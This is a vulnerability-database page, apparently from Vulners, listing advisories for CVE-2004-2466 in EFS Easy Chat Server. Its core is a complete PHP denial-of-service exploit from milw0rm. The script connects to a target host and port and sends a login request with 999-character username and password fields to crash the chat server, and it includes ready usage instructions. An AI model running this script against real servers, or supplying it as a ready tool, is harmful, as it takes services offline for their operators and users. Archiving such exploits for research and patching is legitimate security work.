EFS Easy Chat Server 2.2 - Remote Denial of Service
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| Easy Chat Server 3.1 Buffer Overflow Exploit | 20 Mar 201800:00 | – | zdt | |
| Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH) Exploit | 1 Aug 202200:00 | – | zdt | |
| CVE-2004-2466 | 6 Aug 201000:00 | – | circl | |
| CVE-2004-2466 | 20 Aug 200504:00 | – | cve | |
| CVE-2004-2466 | 20 Aug 200504:00 | – | cvelist | |
| EFS Easy Chat Server - Authentication Request Handling Buffer Overflow (Metasploit) | 6 Aug 201000:00 | – | exploitdb | |
| EFS Easy Chat Server 3.1 - Remote Stack Buffer Overflow | 12 May 201400:00 | – | exploitdb | |
| Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH) | 1 Aug 202200:00 | – | exploitdb | |
| CVE-2004-2466 | 31 Dec 200405:00 | – | nvd | |
| Easy Chat Server 3.1 Buffer Overflow | 17 Mar 201800:00 | – | packetstorm |
10
<?php
##########################################################
###----------------------------------------------------###
###--------Easy Chat Server Remote DoS Exploit---------###
###----------------------------------------------------###
###-http://www.echatserver.com/------------------------###
###----------------------------------------------------###
###-Tested on version 2.2 [last version]-(XP SP2)------###
###----------------------------------------------------###
###-Usage:-php dos.php [TARGET] [PORT]-----------------###
###----------------------------------------------------###
###-Author:--NetJackal---------------------------------###
###-Email:---nima_501[at]yahoo[dot]com-----------------###
###-Website:-http://netjackal.by.ru--------------------###
###----------------------------------------------------###
##########################################################
/*
Description:
Easy Chat Server has built-in web server let users
login to chat server. Login page allow Max 30 characters
length for Name & Password. If attacker inserts a long Name &
Password by editing or make his own login page, chat server
will crash.
*/
echo "Easy Chat Server Remote DoS Exploit\n\t\t\t\tby NetJackal";
if($argc<2)die("\nUsage: php dos.php [TARGET] [PORT]\nExample: php dos.php localhost 80\n");
$host=$argv[1];
$port=$argv[2];
$A=str_repeat('A',999);
echo "\nConnecting...";
$link=fsockopen($host,$port,$en,$es,30);
if(!$link)die("\n$en: $es");
echo "\nConnected!";
echo "\nSending exploit...";
fputs($link,"GET /chat.ghp?username=$A&password=$A&room=1&sex=2 HTTP/1.1\r\nHost: $host\r\n\r\n");
echo "\nWell done!\n";
?>
# milw0rm.com [2007-08-14]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Oct 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.74696